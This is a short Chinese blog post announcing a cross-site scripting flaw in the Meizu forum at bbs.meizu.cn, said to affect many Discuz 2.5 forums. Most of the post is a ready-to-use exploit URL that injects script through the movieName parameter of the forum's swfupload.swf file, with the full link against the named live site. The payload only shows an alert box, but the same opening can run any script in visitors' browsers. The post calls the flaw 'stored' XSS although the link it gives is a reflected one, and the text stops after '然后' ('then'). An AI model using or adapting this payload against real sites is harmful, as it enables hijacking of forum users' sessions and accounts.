魅族论坛出现存储型XSS
官网https://bbs.meizu.cn
目测很多DZ2.5论坛都存在的!
好了。。。下面。。在域名后面加上这段代码
static/image/common/swfupload.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;alert(/www.hlhacker.com/)}}//
是一个文件里面的swf出现了问题。。。所以导致了该存储型的XSS存在
得出。。。。bbs.meizu.cn/static/image/common/swfupload.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;alert(/www.hlhacker.com/)}}//
然后。。。。
评论
热度 ( 1 )
© 黑狼's blog | 关注网络安全 | Powered by LOFTER